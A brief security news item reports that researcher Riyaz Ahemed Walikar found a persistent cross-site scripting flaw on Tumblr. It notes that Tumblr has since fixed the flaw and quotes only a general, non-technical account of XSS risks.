14 DAY TRIAL // Security researcher Riyaz Ahemed Walikar has identified a persistent cross-site scripting (XSS) vulnerability on the popular microblogging platform Tumblr.
XSS flaws are highly common on websites these days, but most of them are non-persistent and implicitly less dangerous.
“XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user's browser using automated frameworks like BeEF and download and execute exploits on the victim's computer,” Walikar explained.
“Stored XSS is even more dangerous since the script is stored on the server and is executed everytime user visits an infected page.”
According to the expert, Tumblr were notified more than three weeks ago on the issue, but so far the website's representatives have failed to address it. Walikar says that he will publish more technical details on the security hole in the upcoming period.
Update. Walikar has told Softpedia that the persistent XSS vulnerability has been addressed by Tumblr. The technical details are available on his blog.